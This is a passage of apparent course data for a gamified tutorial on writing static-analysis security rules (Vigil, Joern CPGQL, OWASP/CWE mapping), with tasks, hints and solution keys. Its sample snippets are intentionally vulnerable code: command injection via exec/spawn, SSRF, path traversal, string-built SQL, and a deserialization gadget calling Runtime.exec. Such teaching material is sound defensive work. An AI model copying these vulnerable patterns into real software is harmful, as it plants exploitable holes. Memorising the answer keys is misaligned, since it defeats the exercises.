Vigil's \`any()\` and \`all()\` operators let you express multi-source, multi-sink, and combined-condition rules without duplicating rule files. Mastering these two operators is the key to writing concise, maintainable rule libraries.

### any() — Logical OR

\`any(expr1, expr2, expr3)\` matches when **at least one** of the listed expressions is true. Use it when multiple sources or sinks should be treated equivalently:

\`\`\`yaml
# Instead of 3 separate rules, write 1:
find flow from any(@user_input, @env.variable, @file.read) to @sql.execute
\`\`\`

This fires if user input, an environment variable, OR a file-read value flows into SQL — one rule, three sources.

### any() for Multiple Sinks

Use \`any()\` on the sink side when different functions are equally dangerous:

\`\`\`yaml
find flow from @user_input to any(@os.exec, pattern "subprocess.run(...)", pattern "os.system(...)")
\`\`\`

You can freely mix concepts and raw patterns inside \`any()\`.

### Eliminating Rule Duplication

Without \`any()\`, covering all Express.js input sources requires three rules:

\`\`\`yaml
find flow from pattern "req.query.$_"  to @os.exec
find flow from pattern "req.body.$_"   to @os.exec
find flow from pattern "req.params.$_" to @os.exec
\`\`\`

With \`@user_input\` — which already maps to all three Express input sources internally — one rule covers everything:

\`\`\`yaml
find flow from @user_input to any(@os.exec)
\`\`\`

### any() in the Sanitizer Position

\`any()\` also works in \`where not passes through\` to accept multiple sanitizers:

\`\`\`yaml
where not passes through any(@parameterized_query, pattern "db.safe_exec(...)")
\`\`\`

### all() — Logical AND

\`all(expr1, expr2)\` matches only when **every** listed expression is true simultaneously. Use it to detect a dangerous combination of conditions:

\`\`\`yaml
find pattern where all(
  matches "$CMD = ...",
  not matches "shell=False")
\`\`\`

This fires only when a command is assigned AND the \`shell=False\` safety flag is absent — precisely targeting the dangerous combination without false positives on safe calls.

### Choosing any() vs all()

| Operator | Use when… |
|----------|----------|
| \`any()\` | Multiple sources, sinks, or sanitizers are equivalent alternatives |
| \`all()\` | Multiple conditions must all hold simultaneously |
| Neither | A simple, single-path taint flow |`,
    task: 'Write a Node.js command injection rule that detects user input from ANY HTTP source (req.query, req.body, req.params) flowing into ANY OS execution function (exec, execSync, spawn). Use @user_input and @os.exec.',
    language: 'javascript',
    snippet: `const express = require('express');
const { exec, execSync, spawn } = require('child_process');
const app = express();
app.use(express.json());

// UNSAFE: query param into exec — should fire
app.get('/ping', (req, res) => {
  const host = req.query.host;
  exec('ping -c 1 ' + host, (err, stdout) => res.send(stdout));
});

// UNSAFE: body param into execSync — should fire
app.post('/run', (req, res) => {
  const cmd = req.body.command;
  const out = execSync(cmd).toString();
  res.send(out);
});

// UNSAFE: route param into spawn — should fire
app.get('/ls/:dir', (req, res) => {
  const dir = req.params.dir;
  spawn('ls', [dir], { shell: true });
  res.send('done');
});

// SAFE: hardcoded command, no user input — should NOT fire
app.get('/status', (req, res) => {
  exec('uptime', (err, stdout) => res.send(stdout));
});`,
    starterRule: `rule node-cmdi:
  version: "1.0.0"
  severity: critical
  confidence: high
  languages: [javascript]
  cwe: ["CWE-78"]
  owasp: ["A03:2021-Injection"]

  query: |
    find flow from ??? to any(???)

  report:
    message: "Command injection: user-controlled input flows into OS command execution."
    fix: "Avoid passing user input to shell commands. Use allowlists and argument arrays with shell: false."`,
    assertions: {
      minFindings: 3,
      mustMatch: ['any(', '@user_input', '@os.exec'],
    },
    hints: [
      'Use @user_input as the source — it covers req.query, req.body, and req.params automatically',
      'Use @os.exec as the sink — it covers exec, execSync, and spawn',
      'Wrap the sink in any(): find flow from @user_input to any(@os.exec)',
    ],
    solution: `rule node-cmdi:
  version: "1.0.0"
  severity: critical
  confidence: high
  languages: [javascript]
  cwe: ["CWE-78"]
  owasp: ["A03:2021-Injection"]

  query: |
    find flow from @user_input to any(@os.exec)

  report:
    message: "Command injection: user-controlled input flows into OS command execution."
    fix: "Avoid passing user input to shell commands. Use allowlists and pass arguments as an array with shell: false."`,
  },
  {
    id: '5-1',
    level: 'expert',
    levelLabel: 'Expert',
    levelEmoji: '🚀',
    module: 5,
    moduleTitle: 'Production Rules',
    title: 'Fixture-Based Testing',
    xp: 500,
    theory: `## Fixture-Based Testing

Rules without tests break silently. A well-crafted rule can degrade over time as language bindings evolve, concept mappings are updated, or the rule itself is refactored. The \`tests:\` block turns your rule into a self-verifying specification that runs on every CI build.

### The tests: Block

Add a \`tests:\` section at the same level as \`query:\`:

\`\`\`yaml
rule detect-ssrf:
  version: "1.0.0"
  severity: high
  languages: [go]

  query: |
    find flow from @user_input to @http.get

  tests:
    - fixture: testdata/ssrf_vuln.go
      expect: 2
    - fixture: testdata/ssrf_safe.go
      expect: 0
\`\`\`

Each test item has two required fields:
- \`fixture\` — path to a code file, relative to the rule file
- \`expect\` — the exact number of findings Vigil must report

### Minimum Viable Test Suite

Every production rule should have **at least two fixtures**:

| Fixture | expect | Purpose |
|---------|--------|---------|
| \`vuln.go\` | \`1\` or more | Proves the rule fires on real vulnerabilities |
| \`safe.go\` | \`0\` | Proves the rule doesn't over-fire on safe code |

A rule with only the vulnerable fixture is half-tested. A code change could silently remove precision — adding false negatives — and you would never know.

### Running Tests

\`\`\`bash
# Run all tests in the current directory
vigil test

# Run tests for a specific rule file
vigil test rules/detect-ssrf.rule
\`\`\`

\`vigil test\` exits **non-zero** if any assertion fails. This makes it safe to use as a CI gate:

\`\`\`yaml
# .github/workflows/ci.yml
- name: Test Vigil rules
  run: vigil test rules/
\`\`\`

### Coverage Reporting

\`\`\`bash
vigil coverage rules/
\`\`\`

Reports which rules have no tests, which have only vulnerable fixtures, and which have full coverage. Aim for 100% rule coverage before shipping a rule pack.

### True Positive vs False Negative

- **True Positive (TP):** rule fires on a real vulnerability — desired
- **False Positive (FP):** rule fires on safe code — annoying, erodes trust
- **False Negative (FN):** rule misses a real vulnerability — dangerous, silent failure

Your vulnerable fixture tests for TP. Your safe fixture tests for FP. FN testing requires the benchmark workflow covered in lesson 5-2.`,
    task: 'Add a tests: block to this SSRF detection rule. Include two fixtures: one for vulnerable code (expect 1 finding) and one for safe code (expect 0 findings).',
    language: 'go',
    snippet: `package main

import (
    "fmt"
    "net/http"
)

// UNSAFE: user-controlled URL passed to http.Get — SSRF
func fetchResource(userURL string) string {
    resp, err := http.Get(userURL)
    if err != nil {
        return ""
    }
    defer resp.Body.Close()
    return fmt.Sprintf("status: %d", resp.StatusCode)
}

// SAFE: hardcoded URL — no SSRF risk
func fetchHealthCheck() string {
    resp, _ := http.Get("https://internal.example.com/health")
    defer resp.Body.Close()
    return fmt.Sprintf("status: %d", resp.StatusCode)
}`,
    starterRule: `rule detect-ssrf:
  version: "1.0.0"
  severity: high
  confidence: high
  languages: [go]
  cwe: ["CWE-918"]
  owasp: ["A10:2021-Server-Side-Request-Forgery"]

  query: |
    find flow from @user_input to @http.get

  report:
    message: "SSRF: user-controlled URL passed to http.Get — attacker can probe internal services."
    fix: "Validate and allowlist URLs before making outbound HTTP requests."`,
    assertions: {
      minFindings: 1,
      mustMatch: ['tests:', 'fixture:', 'expect:'],
    },
    hints: [
      'Add a tests: block at the same indentation level as query:',
      'Each test entry needs fixture: (a file path) and expect: (an integer count)',
      'Add at least two entries: one vulnerable file (expect: 1) and one safe file (expect: 0)',
    ],
    solution: `rule detect-ssrf:
  version: "1.0.0"
  severity: high
  confidence: high
  languages: [go]
  cwe: ["CWE-918"]
  owasp: ["A10:2021-Server-Side-Request-Forgery"]

  query: |
    find flow from @user_input to @http.get

  tests:
    - fixture: testdata/ssrf_vuln.go
      expect: 1
    - fixture: testdata/ssrf_safe.go
      expect: 0

  report:
    message: "SSRF: user-controlled URL passed to http.Get — attacker can probe internal services."
    fix: "Validate and allowlist URLs before making outbound HTTP requests."`,
  },
  {
    id: '5-2',
    level: 'expert',
    levelLabel: 'Expert',
    levelEmoji: '🚀',
    module: 5,
    moduleTitle: 'Production Rules',
    title: 'Benchmark-Driven Development',
    xp: 500,
    theory: `## Benchmark-Driven Development

Fixture tests prove your rule works on the code you wrote. Benchmarks prove it works on **real-world vulnerable applications** you didn't write. The distinction matters: a rule can pass all its fixtures and still miss 40% of real vulnerabilities because the test fixtures don't cover enough variation.

### Precision and Recall

Two metrics define rule quality:

| Metric | Definition | Low value means… |
|--------|-----------|-----------------|
| **Precision** | Fraction of findings that are real vulns | Developer alert fatigue, noise |
| **Recall** | Fraction of real vulns that are found | Missed vulnerabilities, false confidence |

A rule with high precision but low recall is picky — safe, but misses things. A rule with high recall but low precision is noisy — developers start ignoring all findings. **Production rules need both.**

### vigil benchmark

Run your rules against a manifest of known-vulnerable applications:

\`\`\`bash
vigil benchmark --manifest benchmarks/owasp-benchmark.json --rules rules/
\`\`\`

### The Benchmark Manifest

\`\`\`yaml
benchmarks:
  - app: testapps/WebGoat
    language: java
    ground_truth:
      A01:2021-Broken-Access-Control: 12
      A03:2021-Injection: 34
      A07:2021-Identification-Failures: 8
\`\`\`

Each entry lists the expected finding count per OWASP category. Vigil compares your output to these ground-truth counts.

### Reading Benchmark Output

\`\`\`
Category                          Found  Expected  Recall
A01:2021-Broken-Access-Control       6        12    50%
A03:2021-Injection                  31        34    91%
A07:2021-Identification-Failures     7         8    88%
\`\`\`

50% recall on A01 means half the path traversal and broken access control vulns are being missed. That's your improvement target.

### The Improvement Loop

1. Run \`vigil benchmark\` — identify the lowest-recall category
2. Inspect the missed findings — what code pattern is not being matched?
3. Write a new rule targeting that pattern
4. Run \`vigil benchmark\` again — verify recall improved
5. Run \`vigil test\` — verify precision did not degrade

### Metadata Accuracy Matters

CWE and OWASP fields must be correct for the benchmark to categorise your findings accurately. A path traversal rule tagged with \`A03:2021-Injection\` instead of \`A01:2021-Broken-Access-Control\` shows as a miss in the A01 benchmark and an unexpected result in A03 — distorting both scores. Always use the precise identifiers.`,
    task: 'Write a Python path traversal rule that would improve recall for A01:2021-Broken-Access-Control. Fill in the correct CWE (CWE-22) and OWASP metadata fields.',
    language: 'python',
    snippet: `from flask import Flask, request, send_file
import os

app = Flask(__name__)
BASE_DIR = "/var/app/files"

@app.route('/download')
def download():
    filename = request.args.get('file')
    # UNSAFE: user controls filename — path traversal (../../etc/passwd)
    filepath = os.path.join(BASE_DIR, filename)
    return send_file(filepath)

@app.route('/read')
def read_file():
    name = request.args.get('name')
    # UNSAFE: direct open with user-controlled path
    with open(name, 'r') as f:
        return f.read()

@app.route('/static')
def serve_static():
    # SAFE: hardcoded path — no user input
    with open('/var/app/files/index.html', 'r') as f:
        return f.read()`,
    starterRule: `rule python-path-traversal:
  version: "1.0.0"
  severity: high
  confidence: high
  languages: [python]
  cwe: []
  owasp: []

  query: |
    find flow from @user_input to any(@file.open, @file.send)

  report:
    message: "Path traversal: user-controlled input reaches a file operation."
    fix: "Validate and canonicalize paths. Use os.path.realpath() and verify the result starts within the intended base directory."`,
    assertions: {
      minFindings: 2,
      mustMatch: ['CWE-22', 'A01:2021', 'owasp:', 'cwe:'],
    },
    hints: [
      'Path traversal maps to CWE-22 (Improper Limitation of a Pathname to a Restricted Directory)',
      'The correct OWASP 2021 category is A01:2021-Broken-Access-Control',
      'Fill in the cwe: and owasp: list fields with the correct string identifiers',
    ],
    solution: `rule python-path-traversal:
  version: "1.0.0"
  severity: high
  confidence: high
  languages: [python]
  cwe: ["CWE-22"]
  owasp: ["A01:2021-Broken-Access-Control"]

  query: |
    find flow from @user_input to any(@file.open, @file.send)

  report:
    message: "Path traversal: user-controlled input reaches a file operation."
    fix: "Validate and canonicalize paths. Use os.path.realpath() and verify the result starts within the intended base directory."`,
  },
  {
    id: '5-3',
    level: 'expert',
    levelLabel: 'Expert',
    levelEmoji: '🚀',
    module: 5,
    moduleTitle: 'Production Rules',
    title: 'Rule Pack Engineering',
    xp: 500,
    theory: `## Rule Pack Engineering

A **rule pack** is a directory of related rule files with a \`manifest.json\` that describes the collection. Packs are the unit of distribution for Vigil rules — you publish, version, and compose them independently from each other.

### manifest.json Structure

\`\`\`json
{
  "name": "lang-javascript-security",
  "version": "2.1.0",
  "description": "Security rules for JavaScript and TypeScript applications",
  "tags": ["javascript", "typescript", "xss", "injection", "secrets"],
  "rules": [
    "js-xss-innerhtml.rule",
    "js-hardcoded-jwt.rule",
    "js-eval-injection.rule"
  ]
}
\`\`\`

### Naming Conventions

Rule files follow the pattern \`{lang}-{category}-{specific}.rule\`:

| File name | Language | Category | Specific |
|-----------|---------|---------|---------|
| \`js-hardcoded-jwt.rule\` | JavaScript | secrets | JWT secret |
| \`py-sqli-django.rule\` | Python | injection | Django SQLi |
| \`go-ssrf-http.rule\` | Go | SSRF | http.Get |

Pack directory names signal scope: \`lang-python\` (language pack), \`api-security\` (domain pack), \`corp-policy\` (corporate policy pack).

### Pack Organization Strategies

**By language:** Good for teams that maintain rules per language team. Clear ownership.

**By domain/vulnerability class:** Good for security teams that want all XSS rules together regardless of language.

Most mature teams use a hybrid: language packs for framework-specific rules, domain packs for cross-language policy (e.g., \`corp-secrets-policy\`).

### Using Packs

\`\`\`bash
# Run a specific pack
vigil scan --pack rules/lang-javascript src/

# Compose multiple packs
vigil scan --pack rules/lang-javascript --pack rules/corp-policy src/
\`\`\`

### Required Rule Metadata

Every production rule must include all of these fields:

| Field | Purpose |
|-------|---------|
| \`version:\` | Semantic version — enables changelog tracking |
| \`cwe:\` | CWE identifier — required for benchmark categorisation |
| \`owasp:\` | OWASP category — required for compliance mapping |
| \`report.message:\` | Human-readable finding description |
| \`report.fix:\` | Actionable remediation guidance |
| \`exclude:\` | Glob patterns to skip test and fixture files |

### The exclude: Field

Always exclude test paths to avoid false positives in test suites:

\`\`\`yaml
exclude:
  - "**/*.test.js"
  - "**/*.spec.js"
  - "**/*.test.ts"
  - "**/test/**"
  - "**/fixtures/**"
\`\`\`

One vulnerability per rule. Consistent severity. Always include \`fix:\` guidance. These conventions make rule packs composable and trustworthy across teams.`,
    task: 'Write a production-quality rule for detecting hardcoded JWT secrets in JavaScript. Include all required metadata fields (version, cwe, owasp, message, fix) and an exclude: block for test file paths.',
    language: 'javascript',
    snippet: `const jwt = require('jsonwebtoken');

// UNSAFE: hardcoded string literal as JWT secret — should fire
function generateToken(userId) {
  return jwt.sign({ id: userId }, 'supersecret123', { expiresIn: '1h' });
}

// UNSAFE: hardcoded secret stored in a const — should fire
const SECRET = 'my-jwt-secret-key';
function signPayload(payload) {
  return jwt.sign(payload, SECRET);
}

// SAFE: secret from environment variable — should NOT fire
function generateSafeToken(userId) {
  const secret = process.env.JWT_SECRET;
  return jwt.sign({ id: userId }, secret, { expiresIn: '1h' });
}

// SAFE: secret from config object parameter — should NOT fire
function generateConfigToken(userId, config) {
  return jwt.sign({ id: userId }, config.jwtSecret, { expiresIn: '1h' });
}`,
    starterRule: `rule js-hardcoded-jwt:
  languages: [javascript]

  query: |
    find pattern "jwt.sign($PAYLOAD, $SECRET, ...)"
    where $SECRET matches string-literal

  report:
    message: "Hardcoded JWT secret detected."`,
    assertions: {
      minFindings: 2,
      mustMatch: ['version:', 'cwe:', 'owasp:', 'report:', 'message:', 'fix:', 'exclude:'],
    },
    hints: [
      'Add version: "1.0.0", cwe: ["CWE-321"], and owasp: ["A02:2021-Cryptographic-Failures"] at the top',
      'Add a fix: field under report: describing how to load the secret from environment variables',
      'Add an exclude: block with glob patterns like **/*.test.js, **/*.spec.ts, and **/test/**',
    ],
    solution: `rule js-hardcoded-jwt:
  version: "1.0.0"
  severity: high
  confidence: high
  languages: [javascript, typescript]
  cwe: ["CWE-321"]
  owasp: ["A02:2021-Cryptographic-Failures"]

  query: |
    find pattern "jwt.sign($PAYLOAD, $SECRET, ...)"
    where $SECRET matches string-literal

  exclude:
    - "**/*.test.js"
    - "**/*.spec.js"
    - "**/*.test.ts"
    - "**/*.spec.ts"
    - "**/test/**"
    - "**/fixtures/**"

  report:
    message: "Hardcoded JWT secret: the signing key is embedded in source code and exposed in version control."
    fix: "Load the JWT secret from an environment variable (process.env.JWT_SECRET) or a secrets manager. Rotate all tokens signed with the hardcoded key."`,
  },
  {
    id: '6-1',
    level: 'expert',
    levelLabel: 'Expert',
    levelEmoji: '⚡',
    module: 6,
    moduleTitle: 'Joern Mastery',
    title: 'Call Graph Traversal',
    xp: 600,
    theory: `## Call Graph Traversal

Joern builds a **Code Property Graph (CPG)** that models your entire project as one queryable graph — including a full call graph. Every method has two traversal directions:

- \`.caller\` — who calls this method
- \`.callee\` — what methods this method calls

This lets you find **all code paths** that reach a dangerous function, even through multiple layers of abstraction.

### Why this matters

In enterprise Java code a vulnerability rarely lives at the surface. A typical path:

\`\`\`
HTTP Request
  → UserController.getUser(@RequestParam String id)
    → UserService.findUser(id)
      → UserRepository.executeQuery("SELECT ... " + id)   ← SQLi
\`\`\`

File-local tools see the repository method in isolation — no HTTP input, no finding. Joern traces the full call chain.

### \`find crossflow\` — the practical approach

For most cross-layer vulnerabilities, \`find crossflow\` is all you need:

\`\`\`yaml
query: |
  find crossflow from @user_input to @sql.execute
\`\`\`

Joern's \`reachableByFlows\` internally traverses the call graph. It follows data from the source concept through any number of function calls until it reaches the sink — regardless of how many files or classes are in between.

### When call depth matters

Sometimes you want to **limit** or **measure** depth — e.g. "this sink should only be called from the service layer, not directly from a controller". That requires a raw CPGQL query (covered in lesson 6-3). For standard vulnerability detection, \`find crossflow\` handles it automatically.

### Multi-layer Java Spring example

\`\`\`java
// Layer 1: Controller (SOURCE)
@GetMapping("/user")
public String getUser(@RequestParam String id) {
    return userService.findUser(id);   // passes to service
}

// Layer 2: Service
public String findUser(String id) {
    return userRepository.query(id);   // passes to repo
}

// Layer 3: Repository (SINK)
public String query(String id) {
    return stmt.executeQuery(          // SQLi — 3 layers deep
        "SELECT * FROM users WHERE id = '" + id + "'"
    );
}
\`\`\`

A single \`find crossflow\` rule catches this. OpenGrep running on each file separately catches nothing.

### Severity guidance for cross-layer findings

Cross-layer SQLi is still SQLi — severity should be \`high\`. If the taint path has 3+ layers, add a note in the report message to help the developer understand the full call chain.`,
    task: 'Write a cross-file flow rule that detects SQL injection flowing through 3 layers (Controller → Service → Repository) in Java Spring applications',
    language: 'java',
    snippet: `// UserController.java
@RestController
public class UserController {
    private UserService userService = new UserService();

    @GetMapping("/user")
    public String getUser(@RequestParam String username) {
        return userService.findUser(username);  // passes to service layer
    }
}

// UserService.java
public class UserService {
    private UserRepository repo = new UserRepository();

    public String findUser(String username) {
        return repo.queryByName(username);  // passes to repo layer
    }
}

// UserRepository.java
public class UserRepository {
    public String queryByName(String name) {
        // SINK: SQLi — 3 layers from HTTP input
        return stmt.executeQuery(
            "SELECT * FROM users WHERE name = '" + name + "'"
        );
    }
}`,
    starterRule: `rule java-sqli-multilayer:
  version: "1.0.0"
  severity: ???
  confidence: medium
  languages: [java]
  cwe: ["CWE-89"]
  owasp: ["A03:2021-Injection"]

  query: |
    find ??? from @user_input to @sql.execute

  report:
    message: "SQL injection across multiple architectural layers"
    fix: "Use PreparedStatement with parameter binding in the repository layer"`,
    assertions: {
      minFindings: 1,
      mustMatch: ['crossflow', 'java', '@user_input', '@sql.execute', 'high'],
    },
    hints: [
      'The vulnerability spans 3 files — use the interprocedural find type',
      'The keyword for cross-file/cross-layer flow is `crossflow`',
      'Severity: SQLi is always `high` regardless of how deep it is',
    ],
    solution: `rule java-sqli-multilayer:
  version: "1.0.0"
  severity: high
  confidence: medium
  languages: [java]
  cwe: ["CWE-89"]
  owasp: ["A03:2021-Injection"]

  query: |
    find crossflow from @user_input to @sql.execute

  report:
    message: "SQL injection: HTTP parameter flows through Controller → Service → Repository into a raw SQL query. This multi-layer taint path is only detectable with interprocedural analysis."
    fix: "In the repository layer, replace string concatenation with PreparedStatement: ps = conn.prepareStatement('SELECT * FROM users WHERE name = ?'); ps.setString(1, name);"`,
  },
  {
    id: '6-2',
    level: 'expert',
    levelLabel: 'Expert',
    levelEmoji: '⚡',
    module: 6,
    moduleTitle: 'Joern Mastery',
    title: 'Type Hierarchy Analysis',
    xp: 600,
    theory: `## Type Hierarchy Analysis

Joern's CPG contains full type information — including inheritance hierarchies. You can find **all classes implementing an interface or extending a base class**, across the entire project.

### Why it matters for security

In Java, many vulnerability patterns are defined by what interface a class implements:

| Interface / Base Class | Security Implication |
|------------------------|----------------------|
| \`java.io.Serializable\` | Class can be deserialized by attackers — potential gadget for RCE |
| \`javax.servlet.HttpServlet\` | HTTP entry point — all HTTP input enters here |
| \`java.security.PrivilegedAction\` | Runs with elevated privileges |
| \`javax.xml.bind.annotation.XmlRootElement\` | XML deserialization entry point |

Without type hierarchy analysis you must hardcode class names. With it you find **all implementations** — including ones added after you wrote the rule.

### Pattern: \`find class\`

Vigil supports detecting classes by inheritance pattern:

\`\`\`yaml
query: |
  find class "implements Serializable"
\`\`\`

This compiles to a Joern query that checks \`inheritsFromTypeFullName\` across the whole CPG.

### Combining with method detection

The real power is combining type hierarchy with method detection. Finding a class that implements \`Serializable\` is informational. Finding one that implements \`Serializable\` AND has a \`readObject\` method that calls \`exec\` is **critical**.

\`\`\`yaml
# Structural pattern: Serializable class with dangerous readObject
query: |
  find pattern "class $C implements Serializable {
    void readObject(ObjectInputStream $S) {
      ...
      Runtime.getRuntime().exec($CMD);
      ...
    }
  }"
\`\`\`

### When to use \`find class\` vs \`find pattern\`

| Approach | Use when |
|----------|---------|
| \`find class "implements X"\` | You want all implementors regardless of their code |
| \`find pattern "class $C implements X { ... method ... }"\` | You need a specific method inside the implementor |
| \`crossflow\` with concept | You need taint tracking into the class methods |

### Java deserialization context

Every class implementing \`Serializable\` with a custom \`readObject\` is a potential **deserialization gadget**. Attackers chain these gadgets (Apache Commons Collections, Spring Framework) to achieve RCE. Detecting ALL such classes — not just known ones — is the type hierarchy advantage.`,
    task: 'Write a rule to detect Java classes that implement Serializable and contain a readObject method — the classic deserialization entry point that enables gadget chain attacks',
    language: 'java',
    snippet: `// VULNERABLE: Serializable class with custom readObject
public class UserSession implements Serializable {
    private String username;
    private String role;

    private void readObject(ObjectInputStream ois)
            throws IOException, ClassNotFoundException {
        ois.defaultReadObject();
        // Attacker controls username/role after deserialization
        log.info("Session restored for: " + username);
    }
}

// ALSO VULNERABLE: RCE via exec in readObject
public class TaskHolder implements Serializable {
    private String command;

    private void readObject(ObjectInputStream stream) throws Exception {
        stream.defaultReadObject();
        Runtime.getRuntime().exec(command);  // direct RCE
    }
}

// SAFE: Serializable without readObject
public class Config implements Serializable {
    private String host;
    private int port;
}`,
    starterRule: `rule java-serializable-readobject:
  version: "1.0.0"
  severity: ???
  confidence: high
  languages: [java]
  cwe: ["CWE-502"]
  owasp: ["A08:2021-Software and Data Integrity Failures"]

  query: |
    find pattern "???"

  report:
    message: "Class implements Serializable and overrides readObject"
    fix: "Validate deserialized objects with ObjectInputFilter. Consider replacing Java serialization with JSON or Protobuf."`,
    assertions: {
      minFindings: 1,
      mustMatch: ['Serializable', 'readObject', 'CWE-502', 'critical or high'],
    },
    hints: [
      'Use `find pattern` with a structural pattern that matches the class signature',
      'The pattern should match: a class implementing Serializable that has a readObject method',
      'Try: find pattern "class $C implements Serializable { ... void readObject(...) { ... } ... }"',
      'Severity: any class with a custom readObject is a potential gadget — use `high`',
    ],
    solution: `rule java-serializable-readobject:
  version: "1.0.0"
  severity: high
  confidence: high
  languages: [java]
  cwe: ["CWE-502"]
  owasp: ["A08:2021-Software and Data Integrity Failures"]

  query: |
    find pattern "class $C implements Serializable {
      ... void readObject(ObjectInputStream $S) { ... } ...
    }"

  report:
    message: "Class implements Serializable and overrides readObject() — a potential deserialization gadget. Attackers who control the serialized bytes can influence object state during readObject() execution, potentially enabling gadget chain attacks."
    fix: "1. Add ObjectInputFilter to restrict which classes can be deserialized. 2. Consider replacing Java serialization with JSON (Jackson) or Protobuf. 3. If readObject must exist, validate all field values before using them in any operation."`,
  },
  {
    id: '6-3',
    level: 'expert',
    levelLabel: 'Expert',
    levelEmoji: '⚡',
    module: 6,
    moduleTitle: 'Joern Mastery',
    title: 'Raw CPGQL Override',
    xp: 600,
    theory: `## Raw CPGQL Override

Sometimes the Vigil DSL can't express exactly what you need. For those cases, use the \`engines.joern.query\` hint to write raw **CPGQL** (Code Property Graph Query Language) — Joern's native Scala-based traversal API.

### When to use raw CPGQL

| Use case | DSL sufficient? | Need raw CPGQL? |
|----------|----------------|-----------------|
| Standard source → sink taint | ✅ \`find crossflow\` | ❌ |
| All callers of method X | ✅ \`find crossflow\` | Rarely |
| Methods with >N parameters | ❌ | ✅ |
| Calls where arg 2 is a constant | ❌ | ✅ |
| Type-annotated parameter analysis | ❌ | ✅ |
| Control flow dominance checks | ❌ | ✅ |

### Rule file structure

\`\`\`yaml
rule my-advanced-rule:
  version: "1.0.0"
  severity: critical
  confidence: high
  languages: [java]
  cwe: ["CWE-78"]

  query: |
    find call to @os.exec    # fallback for OpenGrep

  engines:
    joern:
      query: |
        cpg.call.name("exec")
          .where(_.argument(1).isIdentifier)
          .l

  report:
    message: "OS command execution detected"
    fix: "Validate and sanitize all arguments to exec()"
\`\`\`

The \`engines.joern.query\` block **overrides** the compiled DSL query when Joern is the engine. The top-level \`query:\` serves as the OpenGrep fallback.

### CPGQL essentials

\`\`\`scala
// Find all calls to a method named "exec"
cpg.call.name("exec").l

// Filter to calls where argument 0 is not a literal (potential injection)
cpg.call.name("exec")
  .where(_.argument(0).isNotLiteral)
  .l

// Find all methods with more than 5 parameters
cpg.method.filter(_.parameter.size > 5).name.l

// Find calls inside methods annotated with @RequestMapping
cpg.annotation.name("RequestMapping")
  .method.call.name("executeQuery").l
\`\`\`

### Return format

Your CPGQL must return a \`List\` of nodes. Vigil reads the node's \`fileName\`, \`lineNumber\`, \`columnNumber\`, and \`code\` fields to populate findings. Always end with \`.l\` to materialize the iterator.

### Key rule: always provide an OpenGrep fallback

If Joern is not installed, the top-level \`query:\` runs via OpenGrep. Make the fallback as useful as possible — even a simple pattern match is better than nothing.`,
    task: 'Write a rule for detecting Runtime.exec() calls in Java using a Joern raw CPGQL engine hint, with an OpenGrep pattern as fallback',
    language: 'java',
    snippet: `public class CommandRunner {

    // VULNERABLE: exec with runtime input
    public void runCommand(String userInput) throws Exception {
        Runtime.getRuntime().exec(userInput);
    }

    // VULNERABLE: exec with string build
    public void runScript(String script) throws Exception {
        String cmd = "bash -c " + script;
        Runtime.getRuntime().exec(cmd);
    }

    // SAFE: hardcoded command
    public void cleanup() throws Exception {
        Runtime.getRuntime().exec("rm -rf /tmp/cache");
    }
}`,
    starterRule: `rule java-runtime-exec:
  version: "1.0.0"
  severity: critical
  confidence: high
  languages: [java]
  cwe: ["CWE-78"]
  owasp: ["A03:2021-Injection"]

  query: |
    find pattern "Runtime.getRuntime().exec($CMD)"

  engines:
    joern:
      query: |
        ???

  report:
    message: "Runtime.exec() call detected — potential OS command injection"
    fix: "Never pass user-controlled strings to Runtime.exec(). Use a whitelist of allowed commands."`,
    assertions: {
      minFindings: 1,
      mustMatch: ['engines:', 'joern:', 'query:', 'exec', 'critical', 'CWE-78'],
    },
    hints: [
      'In CPGQL, find calls by name: cpg.call.name("exec")',
      'Materialize the result with .l at the end',
      'The full CPGQL: cpg.call.name("exec").l',
    ],
    solution: `rule java-runtime-exec:
  version: "1.0.0"
  severity: critical
  confidence: high
  languages: [java]
  cwe: ["CWE-78"]
  owasp: ["A03:2021-Injection"]

  query: |
    find pattern "Runtime.getRuntime().exec($CMD)"

  engines:
    joern:
      query: |
        cpg.call.name("exec").l

  report:
    message: "Runtime.exec() call detected. If any argument originates from user input, this is an OS Command Injection vulnerability (CWE-78) with critical severity."
    fix: "1. Never pass user-controlled data to Runtime.exec(). 2. Use a whitelist of allowed commands. 3. If shell execution is required, use ProcessBuilder with a fixed command array and validated arguments."`,
  },
  {
    id: '7-1',
    level: 'expert',
    levelLabel: 'Expert',
    levelEmoji: '🛡️',
    module: 7,
    moduleTitle: 'Security Engineering',
    title: 'OWASP Coverage Mapping',
    xp: 600,
    theory: `## OWASP Top 10 Coverage Mapping

Every Vigil rule should declare its **OWASP Top 10** and **CWE** mappings. These aren't just labels — they drive compliance dashboards, vulnerability prioritization, and regulatory reporting in DepGuard.

### OWASP Top 10 (2021)

| Category | Key vulnerability types |
|----------|------------------------|
| \`A01:2021-Broken-Access-Control\` | IDOR, path traversal, missing auth checks |
| \`A02:2021-Cryptographic-Failures\` | Weak crypto (MD5/SHA1), missing TLS, hardcoded keys |
| \`A03:2021-Injection\` | SQLi, CMDi, XSS, LDAP injection, template injection |
| \`A04:2021-Insecure-Design\` | Missing rate limiting, insecure defaults by design |
| \`A05:2021-Security-Misconfiguration\` | Open S3 buckets, verbose errors, debug mode in prod |
| \`A06:2021-Vulnerable-Components\` | Known CVEs in dependencies |
| \`A07:2021-Auth-Failures\` | Hardcoded creds, weak passwords, broken session mgmt |
| \`A08:2021-Software-Data-Integrity\` | Unsafe deserialization, missing integrity checks |
| \`A09:2021-Logging-Failures\` | Missing audit logs, logging sensitive data |
| \`A10:2021-SSRF\` | Server-side request forgery |

### Key CWE numbers to know

| CWE | Vulnerability |
|-----|--------------|
| CWE-89 | SQL Injection |
| CWE-79 | Cross-Site Scripting (XSS) |
| CWE-78 | OS Command Injection |
| CWE-22 | Path Traversal |
| CWE-502 | Deserialization of Untrusted Data |
| CWE-798 | Hardcoded Credentials |
| CWE-328 | Use of Weak Hash (MD5, SHA1) |
| CWE-330 | Use of Insufficiently Random Values |
| CWE-918 | Server-Side Request Forgery |
| CWE-284 | Improper Access Control |

### Common mapping mistakes

| Rule detects | Wrong mapping | Correct mapping |
|-------------|---------------|----------------|
| MD5 for passwords | A03:Injection | **A02:Cryptographic-Failures** |
| SQLi | A07:Auth-Failures | **A03:Injection** |
| Hardcoded API key | A03:Injection | **A07:Auth-Failures** |
| Missing auth check | A05:Misconfiguration | **A01:Broken-Access-Control** |
| Unsafe deserialization | A03:Injection | **A08:Software-Data-Integrity** |

### Why correct mapping matters

